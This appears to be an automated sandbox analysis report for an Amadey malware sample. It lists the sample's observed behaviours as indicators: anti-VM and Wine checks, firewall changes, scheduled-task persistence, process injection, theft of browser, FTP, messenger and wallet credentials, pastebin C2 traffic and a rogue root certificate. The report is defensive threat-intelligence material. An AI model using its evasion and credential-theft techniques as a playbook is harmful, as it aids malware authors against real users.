amadey | 4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d

Virtualization/Sandbox Evasion

Processes:

chrosha.exeHNpdMqFjrkn2v8wys1HVMrGB.exe4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	chrosha.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	HNpdMqFjrkn2v8wys1HVMrGB.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe

Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exerundll32.exe

flow pid process

21 1064 rundll32.exe
45 4640 rundll32.exe
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

5172 netsh.exe
5240 netsh.exe

flow	pid	process
21	1064	rundll32.exe
45	4640	rundll32.exe

pid	process
5172	netsh.exe
5240	netsh.exe

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

HNpdMqFjrkn2v8wys1HVMrGB.exeInstall.exeInstall.exe4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exechrosha.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	HNpdMqFjrkn2v8wys1HVMrGB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	HNpdMqFjrkn2v8wys1HVMrGB.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	chrosha.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	chrosha.exe

Executes dropped EXE 37 IoCs

Processes:

chrosha.exeswiiiii.exealexxxxxxxx.exeTraffic.exepropro.exegold.exeNewB.exejok.exeswiiii.exe070.exeis-NS945.tmpcddvdrunner2333.execddvdrunner2333.exeStartup.exefile300un.exe5BYixpIR6qLhdtBI5sLOjhac.exefx1YsP1qlDAnfY4TQQ5RyWVC.exelkLVHXsDUhAgSrtszIRwCQuF.exeHNpdMqFjrkn2v8wys1HVMrGB.exeu2fk.0.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exeJJgSQqOCMgI4o01fmVr0UOxg.exeInstall.exefx1YsP1qlDAnfY4TQQ5RyWVC.exelkLVHXsDUhAgSrtszIRwCQuF.exeu2fk.3.exeAssistant_109.0.5097.45_Setup.exe_sfx.exeassistant_installer.exeassistant_installer.exeBYTCWsHANP2XMf0jXiEYnxb9.exeInstall.exeoadLdjw.exeNewB.exe

pid	process
4260	chrosha.exe
2828	swiiiii.exe
980	alexxxxxxxx.exe
2752	Traffic.exe
2676	propro.exe
2644	gold.exe
2016	NewB.exe
2392	jok.exe
2236	swiiii.exe
4596	070.exe
2716	is-NS945.tmp
2572	cddvdrunner2333.exe
484	cddvdrunner2333.exe
2084	Startup.exe
5036	file300un.exe
3152	5BYixpIR6qLhdtBI5sLOjhac.exe
2876	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
3572	lkLVHXsDUhAgSrtszIRwCQuF.exe
1132	HNpdMqFjrkn2v8wys1HVMrGB.exe
1448	u2fk.0.exe
2648	s7UKFsjOH4GYxoiVxdhmjI7j.exe
1716	s7UKFsjOH4GYxoiVxdhmjI7j.exe
2496	s7UKFsjOH4GYxoiVxdhmjI7j.exe
3724	s7UKFsjOH4GYxoiVxdhmjI7j.exe
2928	s7UKFsjOH4GYxoiVxdhmjI7j.exe
3500	JJgSQqOCMgI4o01fmVr0UOxg.exe
1828	Install.exe
3960	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
4284	lkLVHXsDUhAgSrtszIRwCQuF.exe
2264	u2fk.3.exe
2572	Assistant_109.0.5097.45_Setup.exe_sfx.exe
2892	assistant_installer.exe
2752	assistant_installer.exe
2280	BYTCWsHANP2XMf0jXiEYnxb9.exe
5136	Install.exe
5264	oadLdjw.exe
5416	NewB.exe

Identifies Wine through registry keys 2 TTPs 2 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

Processes:

4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exechrosha.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000\Software\Wine	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
Key opened	\REGISTRY\USER\S-1-5-21-2718508534-2116753757-2794822388-1000\Software\Wine	chrosha.exe

Loads dropped DLL 15 IoCs

Processes:

is-NS945.tmprundll32.exerundll32.exeRegAsm.exerundll32.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exeassistant_installer.exeassistant_installer.exe

pid	process
2716	is-NS945.tmp
3668	rundll32.exe
1064	rundll32.exe
1904	RegAsm.exe
1904	RegAsm.exe
4640	rundll32.exe
2648	s7UKFsjOH4GYxoiVxdhmjI7j.exe
1716	s7UKFsjOH4GYxoiVxdhmjI7j.exe
2496	s7UKFsjOH4GYxoiVxdhmjI7j.exe
3724	s7UKFsjOH4GYxoiVxdhmjI7j.exe
2928	s7UKFsjOH4GYxoiVxdhmjI7j.exe
2892	assistant_installer.exe
2892	assistant_installer.exe
2752	assistant_installer.exe
2752	assistant_installer.exe

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 45.155.250.90
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

description	ioc
Destination IP	45.155.250.90

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

Processes:

HNpdMqFjrkn2v8wys1HVMrGB.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	HNpdMqFjrkn2v8wys1HVMrGB.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

s7UKFsjOH4GYxoiVxdhmjI7j.exes7UKFsjOH4GYxoiVxdhmjI7j.exe

description	ioc	process
File opened (read-only)	\??\F:	s7UKFsjOH4GYxoiVxdhmjI7j.exe
File opened (read-only)	\??\D:	s7UKFsjOH4GYxoiVxdhmjI7j.exe
File opened (read-only)	\??\F:	s7UKFsjOH4GYxoiVxdhmjI7j.exe
File opened (read-only)	\??\D:	s7UKFsjOH4GYxoiVxdhmjI7j.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 pastebin.com
24 pastebin.com
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

47 ipinfo.io
32 ipinfo.io
33 api.myip.com
46 api.myip.com

flow	ioc
2	pastebin.com
24	pastebin.com

flow	ioc
47	ipinfo.io
32	ipinfo.io
33	api.myip.com
46	api.myip.com

Drops file in System32 directory 7 IoCs

Processes:

HNpdMqFjrkn2v8wys1HVMrGB.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	HNpdMqFjrkn2v8wys1HVMrGB.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	HNpdMqFjrkn2v8wys1HVMrGB.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	HNpdMqFjrkn2v8wys1HVMrGB.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	HNpdMqFjrkn2v8wys1HVMrGB.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exechrosha.exeHNpdMqFjrkn2v8wys1HVMrGB.exe

pid process

3172 4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
4260 chrosha.exe
1132 HNpdMqFjrkn2v8wys1HVMrGB.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

swiiiii.exealexxxxxxxx.exegold.exeswiiii.exefile300un.exe

description	pid	process	target process
PID 2828 set thread context of 4480	2828	swiiiii.exe	RegAsm.exe
PID 980 set thread context of 760	980	alexxxxxxxx.exe	RegAsm.exe
PID 2644 set thread context of 4592	2644	gold.exe	RegAsm.exe
PID 2236 set thread context of 1904	2236	swiiii.exe	RegAsm.exe
PID 5036 set thread context of 4620	5036	file300un.exe	AddInProcess32.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

Processes:

fx1YsP1qlDAnfY4TQQ5RyWVC.exelkLVHXsDUhAgSrtszIRwCQuF.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	fx1YsP1qlDAnfY4TQQ5RyWVC.exe
File opened (read-only)	\??\VBoxMiniRdrDN	lkLVHXsDUhAgSrtszIRwCQuF.exe

Drops file in Windows directory 3 IoCs

Processes:

4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\chrosha.job	4feb096d2cdbea37f31ca07efe882debec9092e7e59dd5a4027b14833a10266d.exe
File created	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe
File opened for modification	C:\Windows\Tasks\bWycNackLSywaqkmgR.job	schtasks.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

3668 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1480 2828 WerFault.exe swiiiii.exe
1384 1448 WerFault.exe u2fk.0.exe
3216 3152 WerFault.exe 5BYixpIR6qLhdtBI5sLOjhac.exe

pid	process
3668	sc.exe

pid	pid_target	process	target process
1480	2828	WerFault.exe	swiiiii.exe
1384	1448	WerFault.exe	u2fk.0.exe
3216	3152	WerFault.exe	5BYixpIR6qLhdtBI5sLOjhac.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

u2fk.3.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2fk.3.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2fk.3.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u2fk.3.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RegAsm.exe

Creates scheduled task(s) 1 TTPs 14 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2244	schtasks.exe
4732	schtasks.exe
3516	schtasks.exe
5272	schtasks.exe
5808	schtasks.exe
5596	schtasks.exe
4196	schtasks.exe
5148	schtasks.exe
6020	schtasks.exe
6044	schtasks.exe
5404	schtasks.exe
5772	schtasks.exe
5628	schtasks.exe
6024	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

Install.exeInstall.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

1544 ipconfig.exe

pid	process
1544	ipconfig.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

lkLVHXsDUhAgSrtszIRwCQuF.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1861 = "Russia TZ 6 Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	lkLVHXsDUhAgSrtszIRwCQuF.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

propro.exes7UKFsjOH4GYxoiVxdhmjI7j.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	propro.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d